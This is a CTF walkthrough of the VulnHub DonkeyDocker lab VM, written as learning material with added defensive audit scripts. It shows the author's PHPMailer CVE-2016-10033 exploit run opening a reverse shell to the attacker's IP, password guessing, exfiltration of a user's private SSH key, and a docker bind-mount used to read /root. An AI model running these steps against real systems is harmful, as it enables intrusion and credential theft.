DonkeyDocker 1 – Walkthrough

Overview

CTF Challenge attempted – https://www.vulnhub.com/entry/donkeydocker-1,189/

Tip I found from the setup – if VMWare offers to upgrade the DonkeyDocker image, don’t do it. I did on mine & it broke the IP connectivity from Kali.

This is my first attempt at a CTF, so was an enjoyable learning exercise. I’ve loosely grouped the steps taken below into Reconnaissance & Scanning, Access & Escalation and Exfiltration.

Useful things I learnt along the way:

  • Try simple things first before going with the complicated (i.e. try and guess passwords)
  • Document as you go, it saves having to retrospectively write up what you have done

Reconnaissance & Scanning

First up let’s go and find the host.

[bash]
root@kali:~/Downloads# nmap -sn 192.168.195.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-08 17:41 AEST
MAC Address: 00:0C:29:8D:B7:6E (VMware)
Nmap scan report for 192.168.195.134
Host is up (0.00027s latency).
[/bash]

The other virtual machines have been filtered out of the output above, so we know the target host is at 192.168.195.134. Now let’s see what’s running.

[bash]
root@kali:~/Downloads# nmap -A 192.168.195.134

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-08 18:38 AEST
Nmap scan report for 192.168.195.134
Host is up (0.00067s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:38:ce:11:9c:b2:7a:48:58:c9:76:d5:b8:bd:bd:57 (RSA)
|_ 256 d7:5e:f2:17:bd:18:1b:9c:8c:ab:11:09:e8:a0:00:c2 (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 3 disallowed entries
|_/contact.php /index.php /about.php
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Docker Donkey
MAC Address: 00:0C:29:EA:52:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 192.168.195.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds
[/bash]

Okay, so we have an SSH and a web service running.

First step, let’s see what SSH tells us:
[bash]
root@kali:~/Downloads# ssh 192.168.195.134
Permission denied (publickey,keyboard-interactive).
root@kali:~/Downloads#
[/bash]

So there will be no brute-force guessing of the password; the image is looking for a saved SSH key to log in.

Next let’s pick up robots.txt and see what the web server has to tell us:
[bash]
root@kali:~/Downloads# wget 192.168.195.134/robots.txt
root@kali:~/Downloads# cat robots.txt
User-agent: *
Disallow: /contact.php
Disallow: /index.php
Disallow: /about.php
[/bash]

Looking at the website, we have a fairly basic home page (index.php), an about page that returns an error and a contact form that looks interesting.

A search for vulnerabilities in Apache 2.4.10 and OpenSSH 7.5 doesn’t reveal an easy way in, so on with more scanning. For the next stage I tried dirb to see what else was on the website.

[bash]
root@kali:~# dirb http://192.168.195.134/ -o donkey_dirb.scan
root@kali:~# cat donkey_dirb.scan | grep CODE:200
+ http://192.168.195.134/about (CODE:200|SIZE:2098)
+ http://192.168.195.134/contact (CODE:200|SIZE:3207)
+ http://192.168.195.134/index (CODE:200|SIZE:4090)
+ http://192.168.195.134/robots.txt (CODE:200|SIZE:79)
+ http://192.168.195.134/mailer/LICENSE (CODE:200|SIZE:26421)
+ http://192.168.195.134/mailer/examples/index.html (CODE:200|SIZE:6289)
[/bash]

Loading up /mailer/examples/index.html reveals an installed instance of PHPMailer. From the PHPMailer GitHub page I know the version number is stored in /mailer/VERSION; checking this reveals we are running version 5.2.16.

A quick search leads me to CVE-2016-10033 and https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html: remote code execution in PHPMailer versions below 5.2.18. Looks like our way in.

Access & Escalation

From the above link I downloaded a copy of PwnScriptum_RCE_exploit.py, running it yields:

[bash]
root@kali:~/Downloads# python PwnScriptum_RCE_exploit.py
(ASCII-art banner omitted)

PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit     a.k.a "PwnScriptum"
CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074

This PoC exploit aims to execute a reverse shell on the target in the context of the web-server user via vulnerable PHP email library.

Discovered and Coded by:
Dawid Golunski https://legalhackers.com
t: @dawid_golunski for updates
P.$. For testing only! Don't break the Web 😉

usage: PwnScriptum_RCE_exploit.py [-h] [-H] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT [-d TARGET_UP_DIR] -ip ATTACKERS_IP [-p ATTACKERS_PORT] [--version] [--post-action POST_ACTION] [--post-name POST_NAME] [--post-email POST_EMAIL] [--post-msg POST_MSG]
PwnScriptum_RCE_exploit.py: error: argument -url is required
root@kali:~/Downloads#
[/bash]

Viewing the source of http://192.168.195.134/contact gives me the form field names I need.

Now to run the script:

[bash]
root@kali:~/Downloads# python PwnScriptum_RCE_exploit.py -url http://192.168.195.134/ -cf contact -d mailer -ip 192.168.195.146 -p 7248 --post-action submit --post-name name --post-email email --post-msg message
(ASCII-art banner omitted)

PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit     a.k.a "PwnScriptum"
CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074

This PoC exploit aims to execute a reverse shell on the target in the context of the web-server user via vulnerable PHP email library.

Discovered and Coded by:
Dawid Golunski https://legalhackers.com
t: @dawid_golunski for updates
P.$. For testing only! Don't break the Web 😉

[+] Setting vars to:
WEBAPP_BASE_URL     = [http://192.168.195.134/]
CONTACT_SCRIPT      = [contact]
TARGET_UP_DIR       = [mailer]
ATTACKERS_IP        = [192.168.195.146]
ATTACKERS_PORT      = [7248]
CONTACT_SCRIPT_URL  = [http://192.168.195.134/contact]
BACKDOOR_FILEl      = [phpbackdoor9573.php]
[+] Choose your target / payload:
[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045)        The escapeshellarg() bypass 🙂
[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
[4] Zend Framework / zend-mail < 2.4.11 – Remote Code Execution (CVE-2016-10034)

[?] Select target [1-2]: 1
[+] Generated mail() payload will upload the backdoor into the 'mailer' dir
[+] Backdoor upload via the contact form at the URL 'http://192.168.195.134/contact'
[+] Checking for the backdoor at the URL 'http://192.168.195.134/mailer/phpbackdoor9573.php'

[*] Looking good! The sleep() worked by the looks of it 🙂
Urlopen timed out just in time for the shell 🙂

[+] We should get a shell if we got till here! Spawning netcat now! 🙂

[+] Please tell me you’re seeing this too… 😉

listening on [any] 7248 …
192.168.195.134: inverse host lookup failed: Unknown host
connect to [192.168.195.146] from (UNKNOWN) [192.168.195.134] 40788
bash: cannot set terminal process group (13): Inappropriate ioctl for device
bash: no job control in this shell
www-data@12081bd067cc:/www/mailer$
[/bash]

And we have a shell 🙂

Now we are in, let’s have a little poke around:
[bash]
www-data@12081bd067cc:/www/mailer$ whoami
whoami
www-data
www-data@12081bd067cc:/www/mailer$ cd /
cd /
www-data@12081bd067cc:/$ ls -al
ls -al
total 80
drwxr-xr-x 1 root root 4096 Mar 26 10:33 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rwxr-xr-x 1 root root 0 Mar 26 10:33 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 26 10:31 bin
drwxr-xr-x 2 root root 4096 Dec 28 2016 boot
drwxr-xr-x 5 root root 320 Jul 8 15:47 dev
drwxr-xr-x 1 root root 4096 Mar 26 10:33 etc
drwxr-xr-x 1 root root 4096 Mar 26 10:33 home
drwxr-xr-x 1 root root 4096 Nov 27 2014 lib
drwxr-xr-x 2 root root 4096 Mar 20 23:27 lib64
-rwxr-xr-x 1 root root 289 Mar 24 22:23 main.sh
drwxr-xr-x 2 root root 4096 Mar 20 23:26 media
drwxr-xr-x 2 root root 4096 Mar 20 23:26 mnt
drwxr-xr-x 2 root root 4096 Mar 20 23:26 opt
dr-xr-xr-x 137 root dip 0 Jul 8 15:47 proc
drwx------ 1 root root 4096 Mar 26 10:31 root
drwxr-xr-x 1 root root 4096 Mar 26 10:32 run
drwxr-xr-x 2 root root 4096 Mar 20 23:29 sbin
drwxr-xr-x 2 root root 4096 Mar 20 23:26 srv
dr-xr-xr-x 13 root root 0 Jul 8 16:11 sys
drwxrwxrwt 1 root root 4096 Jul 9 01:44 tmp
drwxr-xr-x 1 root root 4096 Mar 20 23:26 usr
drwxr-xr-x 1 root root 4096 Mar 26 10:31 var
drwxrwxrwx 1 root root 4096 Jul 7 21:06 www
www-data@12081bd067cc:/$ cd /etc/ssl
cd /etc/ssl
www-data@12081bd067cc:/etc/ssl$ ls -al
ls -al
total 44
drwxr-xr-x 4 root root 4096 Mar 26 10:32 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
drwxr-xr-x 2 root root 20480 Mar 26 10:32 certs
-rw-r--r-- 1 root root 10835 Jan 26 23:39 openssl.cnf
drwx--x--- 2 root ssl-cert 4096 Mar 26 10:32 private
www-data@12081bd067cc:/etc/ssl$ cd /home
cd /home
www-data@12081bd067cc:/home$ ls -al
ls -al
total 12
drwxr-xr-x 1 root root 4096 Mar 26 10:33 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
drwx------ 1 smith users 4096 Jul 7 22:58 smith
www-data@12081bd067cc:/home$ cd /
cd /
www-data@12081bd067cc:/$
www-data@12081bd067cc:/$ cat main.sh
cat main.sh
#!/bin/bash

# change permission
chown smith:users /home/smith/flag.txt

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25
www-data@12081bd067cc:/$
[/bash]

Conclusions so far are:

  • We appear to be operating inside a Docker container: there is a .dockerenv file in the root directory, there is no sshd_config file (although the SSH service is answering on the host), and the name of the challenge kinda gives it away
  • There is a user named smith
  • The first flag appears to be in that user’s home directory
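Those indicators can be checked in one go. The script below is an added example and not part of the original walkthrough: it wraps the same three signs (the /.dockerenv file, PID 1’s cgroup naming a container runtime, and PID 1 not being a real init, which on this box is /main.sh) in a function that takes a root directory, so it can be pointed at `/` or at a constructed fake tree. The helper that builds the fake tree, and the cgroup line it writes, are constructed for illustration.

```sh
#!/bin/sh
# Added example, not part of the original walkthrough. Collects the
# "am I inside a container?" indicators used in the write-up as a function
# that takes a root directory, so it can be run against "/" or a fake tree.

# Prints the indicators found, one per line.
# Returns 0 if at least one indicator was found, 1 otherwise.
container_indicators() {
    root="${1:-/}"
    hits=0

    # 1. Docker creates an empty /.dockerenv in every container it starts.
    if [ -e "$root/.dockerenv" ]; then
        echo "dockerenv: $root/.dockerenv exists"
        hits=$((hits + 1))
    fi

    # 2. On cgroup-v1 hosts the cgroup path of PID 1 names the runtime.
    if [ -r "$root/proc/1/cgroup" ] &&
       grep -Eq 'docker|containerd|kubepods|lxc' "$root/proc/1/cgroup"; then
        echo "cgroup: /proc/1/cgroup mentions a container runtime"
        hits=$((hits + 1))
    fi

    # 3. PID 1 is not an init system (in the walkthrough it was /main.sh).
    if [ -r "$root/proc/1/comm" ]; then
        pid1=$(cat "$root/proc/1/comm")
        case "$pid1" in
            init|systemd) ;;
            *) echo "pid1: process 1 is '$pid1', not an init system"
               hits=$((hits + 1)) ;;
        esac
    fi

    [ "$hits" -gt 0 ]
}

# Test helper: builds a constructed fake root that looks like the
# donkeydocker container (empty .dockerenv, PID 1 = main.sh, docker cgroup).
make_fake_container_root() {
    dir="$1"
    mkdir -p "$dir/proc/1"
    : > "$dir/.dockerenv"
    printf '%s\n' "main.sh" > "$dir/proc/1/comm"
    printf '%s\n' "1:name=systemd:/docker/12081bd067cc" > "$dir/proc/1/cgroup"
}

# Usage against the live system; a plain host normally prints the fallback.
container_indicators "${1:-/}" || echo "no container indicators under ${1:-/}"
```

Running it with no argument inspects the live root; passing a directory built by `make_fake_container_root` shows all three indicators firing.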

Onwards to try and guess a few passwords.

[bash]
www-data@12081bd067cc:/$ su smith
su smith
su: must be run from a terminal
[/bash]

su refuses to run because the reverse shell has no controlling terminal, so let’s spawn a proper one.

[bash]
www-data@12081bd067cc:/$ which python
which python
/usr/bin/python
www-data@12081bd067cc:/$ which bash
which bash
/bin/bash
www-data@12081bd067cc:/$ python -c 'import pty; pty.spawn("/bin/bash");'
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@12081bd067cc:/$ su smith
su smith
Password: smith

smith@12081bd067cc:/$
[/bash]

First guess worked. Now let’s see what’s in the user’s home directory.

[bash]
smith@12081bd067cc:/$ cd /home/smith
cd /home/smith
smith@12081bd067cc:~$ ls -al
ls -al
total 32
drwx------ 1 smith users 4096 Jul 7 22:58 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rw------- 1 smith users 0 Jul 7 22:58 .bash_history
-rw-r--r-- 1 smith users 220 Nov 5 2016 .bash_logout
-rw-r--r-- 1 smith users 3515 Nov 5 2016 .bashrc
-rw-r--r-- 1 smith users 675 Nov 5 2016 .profile
drwx--S--- 2 smith users 4096 Mar 22 05:01 .ssh
-rw-r--r-- 1 smith users 237 Mar 22 04:47 flag.txt
smith@12081bd067cc:~$ cat flag.txt
cat flag.txt
This is not the end, sorry dude. Look deeper!
I know nobody created a user into a docker
container but who cares? 😉

But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

PS: I like 1984 written by George ORWELL
smith@12081bd067cc:~$
[/bash]

And flag #1 captured. The message confirms I’m running in a Docker container, so I need to look deeper. The emphasis on the name Orwell is also a hint.

Onwards to dig deeper:

[bash]
smith@12081bd067cc:~$ cd .ssh
cd .ssh
smith@12081bd067cc:~/.ssh$ ls -al
ls -al
total 20
drwx--S--- 2 smith users 4096 Mar 22 05:01 .
drwx------ 1 smith users 4096 Jul 7 22:58 ..
-rwx------ 1 smith users 101 Mar 22 05:01 authorized_keys
-rwx------ 1 smith users 411 Mar 22 04:48 id_ed25519
-rwx------ 1 smith users 101 Mar 22 04:48 id_ed25519.pub
smith@12081bd067cc:~/.ssh$ cat id_ed25519.pub
cat id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICEBBzcffpLILgXqY77+z7/Awsovz/jkhOd/0fDjvEof orwell@donkeydocker
smith@12081bd067cc:~/.ssh$
[/bash]

Hmmm, SSH keys (with the name orwell in the comment). Let’s pick up a copy of these.

[bash]
smith@12081bd067cc:~/.ssh$ cp id* /tmp
cp id* /tmp
smith@12081bd067cc:~/.ssh$ cd /tmp
cd /tmp
smith@12081bd067cc:/tmp$ ls -al
ls -al
total 9928
drwxrwxrwt 1 root root 4096 Jul 9 02:20 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rw-rw---- 1 www-data www-data 103 Jul 7 06:13 dfv676BqRL000023
-rw-rw---- 1 www-data www-data 103 Jul 7 06:29 dfv676R0YA000044
-rw-rw---- 1 www-data www-data 17 Jul 7 07:43 dfv677flLv001719
drwxr----- 2 www-data www-data 4096 Jul 7 07:52 fakemail
-rwx------ 1 smith users 411 Jul 9 02:20 id_ed25519
-rwx------ 1 smith users 101 Jul 9 02:20 id_ed25519.pub
drwxr-xr-x 3 www-data www-data 4096 Jul 7 21:44 output
-rw-rw---- 1 www-data www-data 993 Jul 7 06:15 qfv676BqRL000023
-rw-rw---- 1 www-data www-data 993 Jul 7 06:31 qfv676R0YA000044
-rw-rw---- 1 www-data www-data 2318 Jul 7 07:45 qfv677flLv001719
smith@12081bd067cc:/tmp$ chmod 644 id*
chmod 644 id*
smith@12081bd067cc:/tmp$ cp id* /www/mailer
cp id* /www/mailer
cp: cannot create regular file '/www/mailer/id_ed25519': Permission denied
cp: cannot create regular file '/www/mailer/id_ed25519.pub': Permission denied
[/bash]

Okay, so smith cannot write files to the /www/mailer directory; back to our www-data user.
[bash]
smith@12081bd067cc:/tmp$ logout
logout
bash: logout: not login shell: use `exit'
smith@12081bd067cc:/tmp$ exit
exit
exit
www-data@12081bd067cc:/$ cd /tmp
cd /tmp
www-data@12081bd067cc:/tmp$ cp id* /www/mailer
cp id* /www/mailer
www-data@12081bd067cc:/tmp$
[/bash]

Now to pull the private key down to my Kali box and see if logging in via SSH works (I noted earlier that SSH into the main VM only seems to expect a key, not a password).

[bash]
root@kali:~/Downloads# wget 192.168.195.134/mailer/id_ed25519
--2017-07-10 06:54:16-- http://192.168.195.134/mailer/id_ed25519
Connecting to 192.168.195.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 411
Saving to: 'id_ed25519'

id_ed25519 100%[===================>] 411 --.-KB/s in 0s

2017-07-10 06:54:16 (30.8 MB/s) - 'id_ed25519' saved [411/411]

root@kali:~/Downloads# chmod 400 id_ed25519
[/bash]

Now to see if the key lets us in:

[bash]
root@kali:~/Downloads# ssh -i id_ed25519 orwell@192.168.195.134
Welcome to

___ _ ___ _
| \ ___ _ _ | |_____ _ _| \ ___ __| |_____ _ _
| |) / _ \ ' \| / / -_) || | |) / _ \/ _| / / -_) '_|
|___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
|__/
Made with <3 v.1.0 – 2017

This is my first boot2root – CTF VM. I hope you enjoy it.
if you run into any issue you can find me on Twitter: @dhn_
or feel free to write me a mail to:

– Email: dhn@zer0-day.pw
– GPG key: 0x2641123C
– GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C

Level: I think the level of this boot2root challange
is hard or intermediate.

Try harder!: If you are confused or frustrated don’t forget
that enumeration is the key!

Thanks: Special thanks to @1nternaut for the awesome
CTF VM name!

Feedback: This is my first boot2root – CTF VM, please
give me feedback on how to improve!

Looking forward to the write-ups!

donkeydocker:~$
[/bash]

And we are in – now to have a small poke around.

[bash]
donkeydocker:~$ id
uid=1000(orwell) gid=1000(orwell) groups=101(docker),1000(orwell)
donkeydocker:~$ ls -al
total 24
drwxr-sr-x 3 orwell orwell 4096 Jul 9 05:58 .
drwxr-xr-x 3 root root 4096 Mar 22 05:44 ..
-rw-r--r-- 1 root orwell 1 Mar 26 12:39 .ash
-rw------- 1 orwell orwell 16 Jul 9 06:06 .ash_history
drwx--S--- 2 orwell users 4096 Mar 22 06:01 .ssh
-rw-r--r-- 1 orwell orwell 104 Mar 22 07:34 flag.txt
donkeydocker:~$ cat flag.txt
You tried harder! Good work 😉

Here a flag for your effort: flag01{e20523853d6733721071c2a4e95c9c60}

donkeydocker:~$
[/bash]

The second flag is now ours. Of more interest, orwell also appears to be a member of the docker group, so off to do some more research. The main link I’ve found of use is https://docs.docker.com/engine/reference/commandline/cli/

[bash]
donkeydocker:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
12081bd067cc donkeydocker "/main.sh default" 3 months ago Up 27 seconds 0.0.0.0:80->80/tcp donkeydocker
donkeydocker:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
donkeydocker latest ae644a321321 3 months ago 276 MB
debian jessie 8cedef9d7368 3 months ago 123 MB
donkeydocker:~$
[/bash]

From this I can see that the user orwell can indeed run docker commands; there is one container running (donkeydocker) and two images available.

Further research turns up https://reventlov.com/advisories/using-the-docker-command-to-root-the-host, which shows that a user with docker permissions (orwell) can use docker to run commands as root: the daemon itself runs as root, so bind-mounting a host directory into a container gives the container full access to it. Tinkering with some commands we now have:

[bash]
donkeydocker:~$ docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -la /hack'
total 24
drwx------ 3 root root 4096 Mar 26 10:39 .
drwxr-xr-x 1 root root 4096 Jul 10 20:22 ..
-rw-r--r-- 1 root root 1 Mar 26 10:39 .ash
-rw------- 1 root root 59 Mar 26 10:39 .ash_history
drwxr-xr-x 5 root root 4096 Mar 22 04:29 donkeydocker
-rw-r--r-- 1 root root 195 Mar 22 04:39 flag.txt
donkeydocker:~$ docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'
YES!! You did it :-). Congratulations!

I hope you enjoyed this CTF VM.

Drop me a line on twitter @dhn_, or via email dhn@zer0-day.pw

Here is your flag: flag2{60d14feef575bacf5fd8eb06ec7cd8e7}
[/bash]

Third (and hopefully last) flag found 🙂
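From the defender’s side, the lesson of that last step is that membership of the docker group is root-equivalent and deserves the same auditing as sudo. The script below is an added example, not part of the original walkthrough or of Docker’s own tooling: it lists the docker group’s members from an /etc/group-style file, catches users whose primary group is docker via /etc/passwd (which a look at /etc/group alone would miss), and checks whether the daemon socket is writable by its group or by everyone. Paths default to the live system but can be given explicitly; the user names and files used in the test are constructed.

```sh
#!/bin/sh
# Added example, not part of the original walkthrough: audit who on a host
# is root-equivalent through Docker. File paths default to the live system
# but every function accepts explicit paths so it can run on constructed copies.

# Prints the members of the docker group, one per line, read from an
# /etc/group-style file (name:password:gid:member,member,...).
# Returns 0 if the group has members, 1 if it is absent or empty.
docker_group_members() {
    group_file="${1:-/etc/group}"
    members=$(awk -F: '$1 == "docker" { print $4 }' "$group_file" |
              tr ',' '\n' | sed '/^$/d')
    [ -n "$members" ] || return 1
    printf '%s\n' "$members"
}

# Prints users whose *primary* group (4th passwd field) is the docker gid.
# Returns 1 if there is no docker group at all.
docker_primary_gid_users() {
    group_file="${1:-/etc/group}"
    passwd_file="${2:-/etc/passwd}"
    gid=$(awk -F: '$1 == "docker" { print $3 }' "$group_file")
    [ -n "$gid" ] || return 1
    awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
}

# Returns 0 when the daemon socket is writable by its group or by everyone
# (everyone who can write to it can drive the root-owned daemon), 1 otherwise.
# Works on any path, so a constructed regular file can stand in for the socket.
docker_socket_group_writable() {
    sock="${1:-/var/run/docker.sock}"
    [ -e "$sock" ] || return 1
    # First 10 chars of ls -l are the mode, e.g. srw-rw---- ; char 6 is the
    # group write bit and char 9 the "other" write bit.
    mode=$(ls -ld "$sock" | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage against the live host; each check prints what it finds.
echo "docker group members:"
docker_group_members || echo "  (none)"
echo "users whose primary group is docker:"
docker_primary_gid_users || echo "  (no docker group)"
if docker_socket_group_writable; then
    echo "docker.sock is writable by its group or by everyone: treat those accounts as root"
else
    echo "docker.sock absent or writable by its owner only"
fi
```

On a default Docker install the socket is mode 660 and owned by root:docker, so the last check fires as soon as the docker group has any member; the point of the audit is to make that list explicit and keep it as short as the sudoers list.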
